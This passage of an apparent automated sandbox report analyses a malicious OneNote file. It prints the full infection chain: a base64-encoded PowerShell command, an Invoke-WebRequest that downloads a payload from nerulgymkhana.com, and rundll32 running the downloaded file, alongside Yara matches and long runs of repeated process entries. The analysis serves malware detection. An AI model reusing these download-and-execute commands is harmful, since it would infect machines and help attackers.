Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://powerlift.acompli.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://pushchannel.1drv.ms
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://res.cdn.office.net/polymer/models
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://settings.outlook.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://staging.cortana.ai
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://tasks.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://webshell.suite.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://wus2.contentsync.
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownDNS traffic detected: queries for: nerulgymkhana.com
Source: global trafficHTTP traffic detected: GET /CCoN/01.gif HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: nerulgymkhana.comConnection: Keep-Alive

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 2104, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2104, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Original.one
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:\programdata\putty.jpg
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsr
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsrJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg==')) Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmdJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:\programdata\putty.jpgJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,WindJump to behavior
Source: Send to OneNote.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6124:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEMutant created: \Sessions\1\BaseNamedObjects\OneNoteM:AppShared
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\Documents\{9BFEE3CF-0266-4079-BAB7-95B53E3DF5E2}Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Local\Temp\{5CEEC737-82ED-44D3-8D7A-3C6E23D0875D} - OProcSessId.datJump to behavior
Source: classification engineClassification label: mal64.expl.evad.winONE@14/326@1/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile read: C:\Program Files (x86)\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg==')) Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnkJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnkJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
